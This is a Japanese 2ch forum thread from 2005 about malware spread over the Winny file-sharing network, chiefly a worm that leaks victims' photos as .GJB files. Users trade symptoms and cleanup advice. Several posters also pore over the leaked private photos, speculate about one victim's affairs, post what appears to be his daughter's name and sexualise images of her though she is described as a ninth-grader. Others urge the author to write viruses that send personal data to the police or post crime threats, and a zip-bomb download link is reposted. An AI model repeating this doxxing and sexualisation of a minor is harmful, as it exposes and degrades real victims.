792[名無し]さん(bin+cue).rar:05/03/12 00:45:21 ID:wL65IvQW0
10GBウィルスで怪しいのは

svchost.exe
svc h st.exe

fsutil.exe
fsutil.exe

ctfmon.exe
ct f mon.exe

こんな感じでした。削除したら治るかな?

793[名無し]さん(bin+cue).rar:05/03/12 01:03:26 ID:f27gqG6H0
God knows.
794[名無し]さん(bin+cue).rar:05/03/12 01:04:20 ID:ToCDyB3VO
>>786のって新種かな?
795[名無し]さん(bin+cue).rar:05/03/12 01:20:51 ID:bAFc+yez0
>>794
既存のウイルスでファイルの先頭だけ書き換えてexeにしちゃうっての
あったようなきがするけど、情報少なすぎ。
796[名無し]さん(bin+cue).rar:05/03/12 02:21:33 ID:ToCDyB3VO
再インスコってからにはもうその怪しいのも消しちゃったのかね。
せめてそれどっかにあげとけばなんか分かったかもしれんが
797[名無し]さん(bin+cue).rar:05/03/12 02:34:11 ID:WWWY82d6O
欄検眼段は漢文だそうです。
リャンクーガンドゥと読むそうです。
欄は日本でいう棚田で昔、えらい坊さんが刈り取りが終わった棚田を
1田1作づつ眼をこらしてみたら一俵の米が集まったそうです。
意味は小さな物を集めれば多くなる。
逆に多くの中の小さな物は見過ごしてはいけない、だから良く見なさい、など
798[名無し]さん(bin+cue).rar:05/03/12 02:36:02 ID:f27gqG6H0
>>797
ソースを出したら信じてあげるよ。
799[名無し]さん(bin+cue).rar:05/03/12 03:43:24 ID:IF5DUrnd0
らん ちえん いえん どぅあん
800[名無し]さん(bin+cue).rar:05/03/12 04:27:38 ID:a7CpSWXe0
>>797
やっぱりか。
801[名無し]さん(bin+cue).rar:05/03/12 05:56:06 ID:Dzdze1da0
MADE IN CHINA か?
802[名無し]さん(bin+cue).rar:05/03/12 09:42:12 ID:bAFc+yez0
中国人留学生はけっこういるから無いともいえないが
803[名無し]さん(bin+cue).rar:05/03/12 12:37:28 ID:bIayZ+wm0
民明書房刊
804[名無し]さん(bin+cue).rar:05/03/12 13:51:39 ID:+4n1hGH/0
あと、UPフォルダ内に大量に自分のデスクトップ晒し上げとかいうファイルがあるんですけどウィルスですかこれ?
805[名無し]さん(bin+cue).rar:05/03/12 13:51:59 ID:wnrhLt5f0
>>797
誰の書いた文章?
それから漢文の原文をお願いします。

日本語訳見るよりも、そっちの方が調べるのが楽。
806[名無し]さん(bin+cue).rar:05/03/12 13:52:38 ID:wnrhLt5f0
>>804
コピペするより、まずこのスレ一読しろよ。
807[名無し]さん(bin+cue).rar:05/03/12 13:56:57 ID:rsqDazsg0
了解了解
808[名無し]さん(bin+cue).rar:05/03/12 14:01:12 ID:0JPmK7wt0
>>797
たいして面白くも無い作者オツ
もう来なくていいよ
809[名無し]さん(bin+cue).rar:05/03/12 14:38:12 ID:v3/PNnTW0
>>800
嘘付けw

つーか、漢文と中国語は根本的に違う気がするのだが?
中国の留学生とか関係ない稀ガス
810ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
811[名無し]さん(bin+cue).rar:05/03/12 14:53:08 ID:wnrhLt5f0
>>810
作者の自演自作です
812[名無し]さん(bin+cue).rar:05/03/12 15:06:01 ID:sah/6NmF0
もう見苦しいだけだな。>欄検眼段
二番煎じにもならないくらいの劣化種だ。
813[名無し]さん(bin+cue).rar:05/03/12 15:09:58 ID:bAFc+yez0
実はまだだれも気がついていないすごい仕掛けが
814[名無し]さん(bin+cue).rar:05/03/12 15:24:57 ID:2B6L2OnN0
はいはい。あるといいね
815[名無し]さん(bin+cue).rar:05/03/12 15:34:42 ID:MWd1t9Zd0
>>812-814
そこまで言うことは無いだろ!! ww
816[名無し]さん(bin+cue).rar:05/03/12 15:36:44 ID:ZvquBZ480
作者がちょっとかわいそうになってきた
817ひみつの文字列さん:2024/12/23(月) 19:51:56 ID:MarkedRes
日本国またはアメリカ合衆国、もしくはその両方の著作権法に触れる内容であると疑われることから表示できません。
818[名無し]さん(bin+cue).rar:05/03/12 16:03:50 ID:lxUBgtx90
別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは?

少なくとも、危険なウイルスなわけだし、ヤフーのトップに載るくらいには
やった方がいいと思うよ。
819[名無し]さん(bin+cue).rar:05/03/12 16:05:25 ID:bAFc+yez0
けっきょく、なんて読めばいいんだろう。
820[名無し]さん(bin+cue).rar:05/03/12 16:08:11 ID:ZvquBZ480
「らんけんがんだん」
でいいんじゃねーの?日本人なんだから日本語で
821[名無し]さん(bin+cue).rar:05/03/12 16:13:36 ID:MWd1t9Zd0
欄検眼段_D__新しいフォルダ (3)_コレクション_[キンタマ] 俺のデスクトップ USER1 [04-03-09](ファイル詰め合わせ)_F0005.GJB
822[名無し]さん(bin+cue).rar:05/03/12 16:21:55 ID:MWd1t9Zd0
>>818
>別に作者じゃないけど

このウィルスの厄介なところは、注意を促せば「作者乙」、「自作自演で必死だな」とか
言われる点。そういう作者の意図とは別の次元で拡散防止を図ることが困難になっている。笑
ヤフーのトップに載ったら載ったで、「作者が自分で通報したんじゃないのか?ぷぷぷ」ってなるんだろうな。w
823[名無し]さん(bin+cue).rar:05/03/12 16:24:18 ID:wnrhLt5f0
>>818
>別に作者じゃないけど、もっと他のスレにも宣伝して警戒させるべきでは?
宣伝って、某スレのこんな書き込みのことかな?
504 名前:[名無し]さん(bin+cue).rar[ ] 投稿日:05/03/12 09:43:01 ID:7LP9q65V0
あのう。
それより、欄検眼段がすごいことになってる、みたいな。
GJBはJPGにリネームすればOKらしい。
824[名無し]さん(bin+cue).rar:05/03/12 16:25:29 ID:wjdiLcKd0
>>822
作者乙
825[名無し]さん(bin+cue).rar:05/03/12 16:25:45 ID:YAnVdQgw0
>>818
新作のたびにそんなことできるか
面白いニュイルスならまだしも
こんな平々凡々なもの
826[名無し]さん(bin+cue).rar:05/03/12 16:29:44 ID:LYegh1Tb0
アホばっか
827[名無し]さん(bin+cue).rar:05/03/12 17:36:23 ID:sah/6NmF0
>>826
作者乙
828[名無し]さん(bin+cue).rar:05/03/12 18:02:14 ID:spSuIa7/0
>>826
基地外殿、毎日乙
829[名無し]さん(bin+cue).rar:05/03/12 18:15:31 ID:eU3Xj4bv0
考えてみるとPC内のjpgがバラまかれるって意外にダメージないんだよな。
画像じゃあんまり個人情報を読み取れないし。
830[名無し]さん(bin+cue).rar:05/03/12 18:24:16 ID:sah/6NmF0
>>829
メーラーの送信者情報をアーカイブに添付してくれると、かなり
えらいことになるような悪寒。
831[名無し]さん(bin+cue).rar:05/03/12 18:33:30 ID:bc+zaRgY0
いっそ「欄検眼段の作者だけど何か質問ある?」
ぐらいのスレ立てればよかったのにな>作者
832[名無し]さん(bin+cue).rar:05/03/12 18:36:44 ID:citET7HU0
作者真っ赤になってますよ
833[名無し]さん(bin+cue).rar:05/03/12 18:37:22 ID:7YFKhzvI0
Antinny史上、ここまでバカにされた作者がいたであろうか?
834[名無し]さん(bin+cue).rar:05/03/12 19:34:08 ID:YAnVdQgw0
よっぽどの自信作だったんだろうな
自分でスレ立ててたし
835[名無し]さん(bin+cue).rar:05/03/12 19:44:19 ID:lxUBgtx90
証拠もないのに自分で立てたとか決めつけるなよ。
836[名無し]さん(bin+cue).rar:05/03/12 19:47:55 ID:Z1SxZFs+0
よくわからないけど、必死な人がいますね
837[名無し]さん(bin+cue).rar:05/03/12 19:53:23 ID:ItAASscM0
>>835
838[名無し]さん(bin+cue).rar:05/03/12 20:00:32 ID:tOPhap2B0
作者はよく頑張った
だからゆっくり休めみゃ
839[名無し]さん(bin+cue).rar:05/03/12 20:01:40 ID:rE7dQkaY0
作者、あらゆるアプロダでデスクトップを晒すウィルスを作ってこい。
警視庁に個人情報を送るウィルスでもいい

840[名無し]さん(bin+cue).rar:05/03/12 20:06:33 ID:O2VoASez0
この屈辱が新たなニュイルス作りのモチベーションとなる
841[名無し]さん(bin+cue).rar:05/03/12 20:08:33 ID:wnrhLt5f0
これだけ必死になっているのに、
他板はともかく他スレで話題にものぼらないとは…

作者はもっと宣伝してまわらなきゃ駄目じゃね〜の?
842[名無し]さん(bin+cue).rar:05/03/12 20:14:36 ID:sah/6NmF0
作者が同情や激励されるっていう意味では、たしかに前代未聞だった
な。(w
843[名無し]さん(bin+cue).rar:05/03/12 20:14:59 ID:E7bbk9590
ヨドバシじゃなくてビッグカメラのディスプレイ売り場のデスクトップにnyに流れてるファイルが置かれてた事があったな。
844[名無し]さん(bin+cue).rar:05/03/12 20:21:42 ID:KQdnsCWR0
作者は発想を変えて世の為になるウイルスを作ろうよ

マイナーだけど使い勝手の良いアプリを次々インストールしてディスクトップにショートカットかランチャーをおいたり
スパイウエアを駆除したり
XP高速化させたり
845[名無し]さん(bin+cue).rar:05/03/12 20:27:51 ID:eU3Xj4bv0
苺キンタマやキンタマが相当評判になったから、じゃあPCの中の
画像を勝手に探して放流すれば大混乱になると思ったんだろうなあ。
しかし実際には個人が作った画像にはたいした情報価値はなかったと。
846[名無し]さん(bin+cue).rar:05/03/12 20:31:56 ID:YAnVdQgw0
>>844
ノートン先生を勝手にインスコするウィルスとか
トレンドマイクロのアップデータも先生で使えるようにするとか
847[名無し]さん(bin+cue).rar:05/03/12 20:55:51 ID:qni4pXnL0
ノートン先生を勝手にインスコして、自分は駆除されて消える
完璧
848[名無し]さん(bin+cue).rar:05/03/12 20:57:49 ID:iRp5oYzd0
たしか、ワームを防ぐパッチをあてるワームがあったと思うが
なんだっけ?
849[名無し]さん(bin+cue).rar:05/03/12 21:51:29 ID:v49hPm9n0
おまいらが煽るから怖くなって重要ファイルは全部暗号化したぞ
というか今までそれすら対策してなかったのって... ガクガク(((;゚Д゚)))ブルブル
850[名無し]さん(bin+cue).rar:05/03/12 22:04:41 ID:/dowfZ4q0
重要なファイルを入れておかなきゃいいのに
851[名無し]さん(bin+cue).rar:05/03/12 22:09:50 ID:+yPY06Xy0
2chブラウザのカキコログなどtxtファイルうpなら祭りだっただろうなぁ。
852[名無し]さん(bin+cue).rar:05/03/12 23:03:55 ID:itBAlnKC0
>>844
そういや特定のウイルスを駆除するウイルスがあったな。
ただし、結果的にネットワークに負荷をかけながら延々と感染し続けると言う意味では、
どっちも同じだったが。
853[名無し]さん(bin+cue).rar:05/03/12 23:36:25 ID:3DVpTE0+0
GJB画像ダウソして外付けHDに保存したらHD内のファイルが大量に消えた
これが本当の原因かどうかはわからんけど、怪しいexeを実行した覚えはないし…
854[名無し]さん(bin+cue).rar:05/03/12 23:40:48 ID:TXeSinag0
欄検眼段って一体何?
どこにも詳細書いてないんだけど
855[名無し]さん(bin+cue).rar:05/03/12 23:46:32 ID:bAFc+yez0
MyDoomとNetskyじゃなかったっけ。お互いの悪口なんかも書かれていたとか。
856[名無し]さん(bin+cue).rar:05/03/12 23:49:50 ID:i+b+bPMO0
症状:exe踏んだらパソコン動作が速くなりました

って報告か・・・いいね
857[名無し]さん(bin+cue).rar:05/03/12 23:50:27 ID:i34gKg/70
あぁ?殺すぞ
858[名無し]さん(bin+cue).rar:05/03/12 23:51:48 ID:7iVSTtpf0
もちつけ
859[名無し]さん(bin+cue).rar:05/03/12 23:57:10 ID:i+b+bPMO0
(>_<)ガクガク  ヒー オドサナイデクダサイ-
860[名無し]さん(bin+cue).rar:05/03/13 00:06:34 ID:hJx7pzzv0
↑くだらん雑談uzeee ここは情報スレだろが

ウィルス初心者・教えて厨・スキルねえクソは消えれ 

そりゃそうと、

欄検眼段って何て読むか今すぐ教えろ
861[名無し]さん(bin+cue).rar:05/03/13 00:08:48 ID:ESQ9/0Tf0
(>_<) ヒー
862[名無し]さん(bin+cue).rar:05/03/13 00:08:58 ID:V0ziLp5+0
>>860
検索もできないのか?
863[名無し]さん(bin+cue).rar:05/03/13 00:28:41 ID:uj7vcoAR0
らんけんがんだんの作者様
次は、ny未導入のPCに自動的にny導入&自動で設定まで済ますものか、
または犯罪予告カキコをあちこちに自動投稿するものにしてください。

世の中がいろんな意味で変わると思います。
世間を騒がすこと間違いなしです。
864[名無し]さん(bin+cue).rar:05/03/13 00:35:19 ID:qpEzSM+f0
依頼は良くないなぁ・・。
865[名無し]さん(bin+cue).rar:05/03/13 00:41:34 ID:N7+h4zdt0
【使用OS】 XP
【WindowsUpdateしてるか】 あんまりしてない
【使用AntiVirusソフト】 etrust
【AntiVirusをUpdateしてるか】 してる
【ウイルススキャンの結果】 してる途中にPCが凍る
【オンラインスキャンしたなら結果】 してる途中にPCが凍る
【Winnyのバージョン】 最新
【Winny歴、総DL量】 2年 500Gくらい
【テンプレを読んだか】 呼んだ
【テンプレにある対策を実行したか】 した
【症状、具体的に分かる限りすべて書く】
Winny起動するとPCが凍る。
ダウンフォルダをスキャンすると凍る。ダウンフォルダ捨てようとしても凍る。
何これぇ・・・

【何をしたらそんなことになったのか】不明
【これまでにとった措置】スキャン

これってウィルスなんでしょうか?スキャンすらできないなんて・・・
866[名無し]さん(bin+cue).rar:05/03/13 00:43:44 ID:Bh5jHPTe0
HDD臨終間近
867[名無し]さん(bin+cue).rar:05/03/13 00:52:08 ID:qpEzSM+f0
コンヤガヤマダ
868865:05/03/13 00:55:45 ID:N7+h4zdt0
うっそぉ
869[名無し]さん(bin+cue).rar:05/03/13 00:59:25 ID:MMVtFdoH0
>>868
外付けでも何でもいいから今すぐ新しくHDDを購入してデータ移しとこう。
今使ってるHDDはキャッシュ用にでも使おう。
870[名無し]さん(bin+cue).rar:05/03/13 00:59:38 ID:N9VslGBd0
今夜が山田(>_<)
871[名無し]さん(bin+cue).rar:05/03/13 01:05:14 ID:bL5pg1zP0
これだけ負の話題で騒がれてるのに感染した、って報告がないってのは
もしかして欄検眼段自体が自演なのでは?
872[名無し]さん(bin+cue).rar:05/03/13 01:21:00 ID:EaM/k28t0
その説は真っ先に指摘された
873[名無し]さん(bin+cue).rar:05/03/13 01:46:09 ID:G/rTkPYpO
とりあえずダメージあるとすれば
辻のおっちゃんが児童ヌルポでタイーホ
874[名無し]さん(bin+cue).rar:05/03/13 01:52:37 ID:G/rTkPYpO
そして
フジが
独占スクープ!関西に続き東京タイーホの瞬間
875[名無し]さん(bin+cue).rar:05/03/13 02:22:31 ID:qpEzSM+f0
6分後に思いついてわざわざ書き込んだの?
876[名無し]さん(bin+cue).rar:05/03/13 02:28:10 ID:YiDraiai0
>>873
自動ガッ!!
877[名無し]さん(bin+cue).rar:05/03/13 03:03:09 ID:G/rTkPYpO
セクース中だから6分かかったの
児童ポルヌと書くつもりが間違えたじゃないか
しかもガッされたじゃないか
878[名無し]さん(bin+cue).rar:05/03/13 03:04:44 ID:G/rTkPYpO
そして
おやすみage
879[名無し]さん(bin+cue).rar:05/03/13 03:14:51 ID:gsIMvZDU0
赤ちゃんと一緒に写ってる女のこのフェラ画像が???
同じ人から流出してるっぽいし。
880[名無し]さん(bin+cue).rar:05/03/13 04:21:27 ID:6+H1WJ3h0
でGJBは怖いウイルスなの?
881[名無し]さん(bin+cue).rar:05/03/13 04:33:24 ID:O6LyrwEa0
欄検眼段については、ずいぶん前から流れてるんだが、それらしきワーム本体が今のところ未確認なんだよ。
ただ、自作自演でないのは明らかだし、トリップが固定されてるところからも
nyを狙ったものだとは分かるのだが

以前、解析を試みた 偽造解除.xxx は、すでに先生がTrojan Horseとして識別済み
まだ懲りないの?.xxx は、未識別。これやも知れん。

>880
感染者が気付かないという点では、巧妙になってるので、それなりに怖いけどな
今のとこ JPEG → GJB にして流すだけだが、ユーザー名とフォルダ階層はばれる
ほかに 何をしてるか 判明してない
882[名無し]さん(bin+cue).rar:05/03/13 04:39:59 ID:gsIMvZDU0
ファイル名からおおよその住所や名前写真ばら撒かれてる人とかいるな。
かわいそうに。
883[名無し]さん(bin+cue).rar:05/03/13 10:42:26 ID:5BIG7oMu0
欄検眼段のおすすめファイルを教えて君
884[名無し]さん(bin+cue).rar:05/03/13 11:52:21 ID:/yG7ol8Q0
【使用OS】WindowsXP
【WindowsUpdateしてるか】していません
【使用AntiVirusソフト】NOD32
【AntiVirusをUpdateしてるか】毎日チェック
【ウイルススキャンの結果】あるはずのないファイルが NOD32スキャン(ウイルス警告)表示される
落とした動画を見ていると良くWindows Media Playerが固まる
             タスクマネージャー→タスク→WMPのタスク終了をしないと起動しない
【オンラインスキャンしたなら結果】 あるはずのないファイルが NOD32スキャンで表示される
【Winnyのバージョン】v2,0 b7.1
【Winny歴、総DL量】8ヶ月くらい
【テンプレを読んだか】読みました
【テンプレにある対策を実行したか】どの対策が良いかわからない
【症状、具体的に分かる限りすべて書く】Winny2MemPatchを試しに使ったのが原因かも
                   あるはずのないファイルはウイルス?
                   最近Zone Labs Securityに頻繁にポートスキャン警告が
                   00.000.000 (port 000)からのアクセスを遮断と良くでる
【これまでにとった措置】UPフォルダ&アップTXTファイルを消去、毎日スキャン、Zone Labs Security
            PROを購入、重要ファイルを外付けHDDに移動、winny使用停止、開放ポート閉
885[名無し]さん(bin+cue).rar:05/03/13 11:55:56 ID:MMVtFdoH0
その「あるはずのないファイル」ってのは検出されたファイルのパスが存在しないって事?
886[名無し]さん(bin+cue).rar:05/03/13 12:04:39 ID:UiZutvsw0
>>885
そうです、調べていてウイルスが作ったファイルのキーワード(素人)などが
含まれているのですが、このファイルに個人情報は含まれますか?
887[名無し]さん(bin+cue).rar:05/03/13 15:23:14 ID:PQGKL8ld0
池沼の書き込みです、皆さん苦笑してやってください。
888[名無し]さん(bin+cue).rar:05/03/13 15:24:21 ID:5BIG7oMu0
欄検眼段_D__デジカメ_EZTOUCH_MIYOKO_〇秘_

欄検眼段_C__DOCUMENTS AND SETTINGS_ひで_MY DOCUMENTS_MY PICTURES_雑_

このシリーズは・・・
889[名無し]さん(bin+cue).rar:05/03/13 16:08:05 ID:O6LyrwEa0
>>884
Winny2MemPatchにはメール砲仕込まれてるVer.もあるからな。アウト。
あるはずのないファイルをどうやって検出するのかと小一時間。

欄検眼段の本体探しのために、ダミーPC起動を決意。そのうち地引きに
ネタが繋るかも…。
890[名無し]さん(bin+cue).rar:05/03/13 16:24:34 ID:m+fFJCbi0
湯沢雄勝合併協議会が晒されてるな
891[名無し]さん(bin+cue).rar:05/03/13 16:48:30 ID:2ofVDGhx0
一番最初にGO BACK落とせば良いのに。
892[名無し]さん(bin+cue).rar:05/03/13 16:59:14 ID:5Yg8Kho10
>>889
それクラック版ではガセ決定だが。
893[名無し]さん(bin+cue).rar:05/03/13 17:00:21 ID:5Yg8Kho10
失礼クラックスレ。
894[名無し]さん(bin+cue).rar:05/03/13 17:11:31 ID:eeqIToKD0
ポッポー (´ \  | __________/ヽ       / 
         .l l \| | !ノートン先生 ! //U ヽ___/ 
パソコン蛾人  \ !!大激怒!! //   U    :::U: 
ぶっ壊れ(__)   \ !!!!! / // ___   \  ::: 
たお! (__)    \∧∧∧∧/   |  |   |    U :::: 
     (`Д´#)   < ぶ パ >   |U |   |     ::U: 
   _| ̄ ̄||_)_ <  っ ソ >    | ├―-┤ U.....:::: 
 /旦|――||// /| < 壊 コ >    ヽ     .....::::::::: 
─────────< れ ン >────────── 
<   _,ノ , 、ヽ、_ ノ< た 蛾>  プスプスプス・・・・・∬∬ 
 (y○')`ヽ) ( ´(y○')<  !!!   >踏んじゃったよぉ___ 
  ⌒ /    ヽ⌒ /∨∨∨∨\   ∧_∧  ||\   
うわあ |~ ̄ ̄~.|ぁぁ/パソコン蛾ぶ \ ( ;´Д`)  || | 
ぁぁ| |||! i: |||! !|ぁ/っ壊れた!ディス \(  つ/ ̄||/ 
ぁぁ| |||| !! !!||| :|/プレイが砕け散った! \ヽ |二二二」 
895[名無し]さん(bin+cue).rar:05/03/13 17:13:51 ID:I2TDe1VR0
>>891
そしてそのGo BackにWhiterやbatウイルスが仕込まれている現実。
システム復旧系のアプリは、ほとんど細工されてると思って間違いない。
896[名無し]さん(bin+cue).rar:05/03/13 18:14:57 ID:zPz+gJdn0
テンプレに

XMLのOBJECT要素によってコマンドを起動するバグ対策に、
 HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0にあるFlagsの値を
 10進数で1に変更する。

と、書いてあるのですが やり方がわかりません・・・ 
どなたか教えて頂けないでしょうか?
897[名無し]さん(bin+cue).rar:05/03/13 18:18:59 ID:zPz+gJdn0
ageてしまってすみませんでした
898896:05/03/13 18:21:26 ID:zPz+gJdn0
896ですが自己解決しました
ご迷惑おかけしました
899[名無し]さん(bin+cue).rar:05/03/13 18:39:49 ID:MMVtFdoH0
つーかよくメ・・・いやなんでも。
900[名無し]さん(bin+cue).rar:05/03/13 18:40:30 ID:O6LyrwEa0
>>892-893
本家というか最初のオリジナルには、確かに何も仕込まれてないが
それ以降のものは、府警アドレスが仕込まれてるのだが…
(ガセと信じたい気持ちも分かるが、ヘンなもんに手を出すのは寄席)
901[名無し]さん(bin+cue).rar:05/03/13 19:49:03 ID:zBIgHMwi0
さっさとシマンテックに提出しろクズ
902[名無し]さん(bin+cue).rar:05/03/13 21:03:36 ID:IK3bnU8+0
昨日の夜ny落として一時間ほどで「キャッシュが不足しています」って出て、
落とせなくなったんで切ったら何回電源入れても「何とか is missiing」って出てウィンドウズが起動しなくなっちゃった・・
結局再インストしたんだけど、これってウィルスだったのかな
903[名無し]さん(bin+cue).rar:05/03/13 21:15:51 ID:MMVtFdoH0
>>902
情報が不足しています
904[名無し]さん(bin+cue).rar:05/03/13 21:17:26 ID:I2TDe1VR0
>>902
知識も不足しています
905[名無し]さん(bin+cue).rar:05/03/13 21:18:11 ID:o9oiX01E0
アホばっか
906[名無し]さん(bin+cue).rar:05/03/13 21:24:12 ID:ex4OgW5q0
実行したら「捏造です、ついでにウィルスいれときますね( ´,_ゝ`)プッ」みたいなダイアログの出る
exe踏んでしまったんですが、既出だとは思うのですが、どういう内容とか調べられるところは
ないでしょうか? 一応色々見てみたのですが自信がなくて・・・。
907[名無し]さん(bin+cue).rar:05/03/13 21:45:12 ID:MMVtFdoH0
>>906
括弧内の文を見る限りVB厨な感じがする。
しかもダイアログ出して喜んでそうなタイプに思える。
908[名無し]さん(bin+cue).rar:05/03/13 21:54:40 ID:gsIMvZDU0
>>888
気になるよな・・
909[名無し]さん(bin+cue).rar:05/03/13 22:00:24 ID:YiDraiai0
>>906
自信がなければクリーンインスコ
それがニュイルススレクォリティ

嫌なら窓から(ry
910[名無し]さん(bin+cue).rar:05/03/13 22:09:44 ID:sXXKAZd30
>>908
Hなの?

欄検眼段ってデジカメそのまんまの画像が多いから、フォトショップなんかの
画像用アプリに本体が紛れ込んでるのかな?
911906:05/03/13 22:10:01 ID:A9wDglGu0
とりあえず実行前、後ともにノートン先生は反応なし、プロセスも変わったところはない…と思う。
気休めにシステムの復元しておきましたがイタズラのような気がします。
何かあったらまた報告に来ます。ありがとう。
912[名無し]さん(bin+cue).rar:05/03/13 22:24:31 ID:gsIMvZDU0
>>910
もしかしてオリジナルエロ画像?って感じ。
913[名無し]さん(bin+cue).rar:05/03/13 22:27:02 ID:sXXKAZd30
>>912
拾え始めたが、そうみたいだね。グッジョブ!!
914[名無し]さん(bin+cue).rar:05/03/13 22:29:48 ID:pIK8xr7f0
ちらっと一枚うpしてみてよ
915[名無し]さん(bin+cue).rar:05/03/13 22:41:38 ID:sXXKAZd30
このひでさん、中3の娘さんがいて、家族旅行とかも行ってるんだけど
複数の女の人と浮気してるっぽい。援助交際かも。
オレがこう言うのも筋違いなんだけど、娘さんが思春期なんだから
色んな女と浮気するのはどうかと思う。
916[名無し]さん(bin+cue).rar:05/03/13 22:47:06 ID:gsIMvZDU0
ひでさんおもしろいな。男の中の男だぜ!
917[名無し]さん(bin+cue).rar:05/03/13 22:51:24 ID:sXXKAZd30
娘さん素直そうな可愛らしい子なのになあ。娘さんがPCの中身を見たら傷つくから気を付けてほしい。
ひでさんの個人情報が分かったら、その辺の所をメールか電話で注意したい。笑
918[名無し]さん(bin+cue).rar:05/03/13 22:56:39 ID:gsIMvZDU0
娘さんのセクシーショットもなかなか(;´Д`)ハァハァ
919[名無し]さん(bin+cue).rar:05/03/13 23:00:45 ID:sXXKAZd30
ひでさん、浮気写真と家族写真を同じレベルの階層に置いてあるっぽいけど
大丈夫なのかな?
920[名無し]さん(bin+cue).rar:05/03/13 23:00:55 ID:wkylO5B10
なんか個別スレ立ってるYO

[欄検眼段]新手のウイルス[GJB]
http://tmp4.2ch.net/test/read.cgi/download/1110716092/l50
921[名無し]さん(bin+cue).rar:05/03/13 23:01:10 ID:6haYWmgc0
釣りじゃないならうpってくれよ
922[名無し]さん(bin+cue).rar:05/03/13 23:08:27 ID:qegB4bKI0
>>920
作者がやっとかまってもらえてうれしいようです。
923[名無し]さん(bin+cue).rar:05/03/13 23:08:29 ID:I2TDe1VR0
>>920
ここで相手にされないからって、作者必死だな。(w
924[名無し]さん(bin+cue).rar:05/03/13 23:08:31 ID:MMVtFdoH0
素晴らしいッッ!!!!
これがッッ!!!!ニュイルスクオリティッッッ!!!!
925[名無し]さん(bin+cue).rar:05/03/13 23:20:19 ID:sXXKAZd30
EZTOUCHも浮気してるな。奥さんは出産したばかりなのに。
926[名無し]さん(bin+cue).rar:05/03/13 23:25:05 ID:BxhGaCwI0
jpgで判る個人情報は結局浮気ぐらいが関の山ってことか。
927[名無し]さん(bin+cue).rar:05/03/13 23:29:27 ID:5Yg8Kho10
>>900
いや、だからそれ、NYで流れてる奴だろ?
928[名無し]さん(bin+cue).rar:05/03/13 23:39:11 ID:1ZZ0gIMO0
欄検眼段の感染元ってなんなんだろ?
929[名無し]さん(bin+cue).rar:05/03/13 23:41:17 ID:8R+nGIoP0
>>928
作者の脳内ウィルス。
朝起きたらすべては夢だったのさ、おしまい。ってネタです。
930[名無し]さん(bin+cue).rar:05/03/13 23:48:28 ID:Kl9FR7yc0
ひでさんは鈴鹿に何を見に行ったのか。小一時間問いつめたい。
931[名無し]さん(bin+cue).rar:05/03/13 23:56:17 ID:gsIMvZDU0
ヒント・おしり
932[名無し]さん(bin+cue).rar:05/03/14 00:09:45 ID:5TwCQ4730
今頃、GJB=グッジョブだったのかと気付いた風呂あがり...
なんでこんな拡張子にしてるのかとオモタ
933[名無し]さん(bin+cue).rar:05/03/14 00:16:00 ID:gVdVG+o70
個別スレで騒いでる3へ

先に踏んだ人間からアドバイスさせてもらうと、めんどくさがらずに
Windowsの入れ直しを勧める。

システムの復元ができなくなったり、ゴミ箱へファイルを捨てるときに
やたら時間がかかったりでWindowsのサービス自体が結構いじられ
てたので、結局入れ直させざるをえなかった。
934個別スレ3:05/03/14 00:18:42 ID:bgjSXYri0
>>933
センキュ!
OS入れ直します!
935[名無し]さん(bin+cue).rar:05/03/14 00:20:13 ID:Yz+QfA+h0
自衛隊の写真、コンパニオンと楽しそう・・・・
936[名無し]さん(bin+cue).rar:05/03/14 00:20:48 ID:xm90zLqt0
あれ? 数日見てないうちにGJB大人気だな。
あれだけ作者相手にして貰えなかったのに。
937[名無し]さん(bin+cue).rar:05/03/14 00:22:25 ID:RUX9/oRl0
感染元はなんなんだろ?
938[名無し]さん(bin+cue).rar:05/03/14 00:34:26 ID:MxgcOpmo0

娘:三好由布子
939[名無し]さん(bin+cue).rar:05/03/14 02:31:05 ID:IOFU6b/40
お気に入りは、かすみんとYAYOIかな。

YAYOIって公開されてるの?チクービ写真とか。
940[名無し]さん(bin+cue).rar:05/03/14 03:19:59 ID:BjooW71u0
・感染源が分からない
・トリップが同じ

実はnyで広まるウイルスではなく、
作者が何らかの手法で自動収集した画像をアップし続けているだけとか・・?
941[名無し]さん(bin+cue).rar:05/03/14 03:42:08 ID:IHkYPd1c0
>>940
そうだと思う。
942[名無し]さん(bin+cue).rar:05/03/14 03:51:39 ID:GSUnf5uJ0
真偽は知らぬが、欄検眼段の知名度向上を工作したり、
放流された画像を見てニヤニヤしたりするだけなら、このスレ的に無益だわな

有用なのは、被害に気付いた感染者か実行ファイルを突き止めた人が
提供する情報・客観的事実だけ
943[名無し]さん(bin+cue).rar:05/03/14 04:17:12 ID:XOehXajG0
ウィルスとは違うんだけど…↓みたいなのがnyに輸入されたみたいだ

おいお前ら 面白いもんつくったぞ。
http://ex7.2ch.net/test/read.cgi/news4vip/1110734293/

1 名前:以下、名無しにかわりましてVIPがお送りします 投稿日:05/03/14 02:18:13 ID:/3Gmdw0M0
ttp://pcqa.s3.xrea.com/upload/source/up0132.zip
これ。 zipの状態では1.5Mだけど、解凍すると1.5G
944[名無し]さん(bin+cue).rar:05/03/14 04:24:00 ID:HOB2zZYg0
スゲー て圧縮出来てる訳じゃなくて
起動→ファイル作成なんだろうけど
早速落としてみよ
945[名無し]さん(bin+cue).rar:05/03/14 04:28:41 ID:tTwIMu1c0
19 以下、名無しにかわりましてVIPがお送りします New! 05/03/14 02:28:00 ID:/3Gmdw0M0
>>15
んーとな、とりあえず圧縮ってものはなんなのか一行で説明してやろう



AAAAAAAAAABBBBBCCC  → A10B5C3     こんなかんじ
946[名無し]さん(bin+cue).rar:05/03/14 04:47:26 ID:a+x29Ryd0
>943
なんでlzhで圧縮しなかったんだろうな?
947[名無し]さん(bin+cue).rar:05/03/14 05:06:53 ID:opgDD7oR0
ここの連中って笑えるな。
948[名無し]さん(bin+cue).rar:05/03/14 05:22:37 ID:a+x29Ryd0
949[名無し]さん(bin+cue).rar:05/03/14 06:05:33 ID:5TwCQ4730
>>940-941
欄検眼段については依然として調査中
共通トリップだが、接続ノード(IP)を見てると、てんでバラバラ
同一作者が流し続けているブツとは考えにくい。何らかのワーム説を主張する
>>942
同意、感染者を特定にしにくいのがネック。ダミーPCで怪しげなのを踏んでは
みてるが、未だ流れた形跡なし。アプリ系に仕込まれてるとなると、落とすのは
ともかく実験目的で動かすのもリスクだしな。感染源を探すのも楽じゃない。

